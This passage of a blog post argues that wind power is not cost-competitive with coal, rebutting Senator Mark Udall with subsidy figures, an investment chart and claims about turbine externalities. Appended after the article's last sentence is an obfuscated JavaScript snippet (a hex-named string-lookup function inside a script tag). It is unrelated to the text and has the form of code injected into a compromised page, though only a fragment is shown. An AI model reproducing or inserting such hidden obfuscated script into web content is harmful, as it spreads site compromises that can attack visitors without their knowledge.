Mark Udall&#8217;s claims that Colorado&#8217;s renewables mandate had been a &#8220;great success.&#8221; This time, let&#8217;s look at his claims that &#8220;<a href=\"http:\/\/www.youtube.com\/watch?v=q2i1V2fVzcM\" target=\"_blank\">&#8230;wind, now, competes with coal and some would argue is actually cheaper than coal.<\/a>&#8221;<\/p>\n<p>The only way that someone could make that claim is if they ignored the <a href=\"http:\/\/www.cbo.gov\/sites\/default\/files\/cbofiles\/attachments\/03-06-FuelsandEnergy_Brief.pdf\" target=\"_blank\">subsidies<\/a> that wind gets in comparison with anything we get electricity from today (that CBO report was issued just a few weeks ago at the behest of the very committee in which Udall serves and made his remarks):<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.powerlineblog.com\/admin\/ed-assets\/2012\/03\/Green-subsidies-copy.jpg\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/www.powerlineblog.com\/admin\/ed-assets\/2012\/03\/EnergySubsidies0447.jpg\" alt=\"\" width=\"642\" height=\"520\" \/><\/p>\n<p>The jobs that Bennet brags about include those from Vestas, which the <a href=\"http:\/\/www.chieftain.com\/news\/local\/they-loom-but-no-layoffs-at-vestas\/article_6e922f72-81f3-11e1-805c-001a4bcf887a.html\" target=\"_blank\">company admits only exist because of those subsidies<\/a>.<\/p>\n<p>The proof, of course, is in the markets. The energy that could successfully compete with a power source that has its capital expenditures almost completely amortized &#8211; most coal plants were built decades ago &#8211; would seem to be a natural for investors. Unfortunately, well&#8230;<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/www.jsharf.com\/images\/FAN-ETF.jpg\" alt=\"\" width=\"640\" height=\"303\" \/><\/p>\n<p>Proponents of wind energy will point to the various externalities associated with coal. Of course, wind has a few externalities of its own, like <a href=\"http:\/\/www.theglobeandmail.com\/news\/national\/windfarm-turbines-deadly-for-birds-bats\/article1598597\/\" target=\"_&quot;blank&quot;\">bird kills<\/a>, <a href=\"http:\/\/www.engadget.com\/2012\/04\/30\/study-wind-turbines-raise-area-temperature-\/\" target=\"_&quot;blank&quot;\">higher local temperatures<\/a>, and <a href=\"http:\/\/scitechdaily.com\/scottish-wind-turbine-explodes\/\" target=\"_blank\">downwind crop &amp; building damage<\/a>.<\/p>\n<p>Sorry, Mr. Udall.\u00a0 Wind isn&#8217;t competitive with coal, and although the Obama administration seems hell-bent on driving up the cost of coal, they&#8217;ve got a way to go, notwithstanding all the damage they&#8217;ll do to your wallet in the process.\u00a0 It&#8217;s not even close, and they <em>still<\/em> try to cheat.<br \/>\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>In our last post, we looked at Sen.
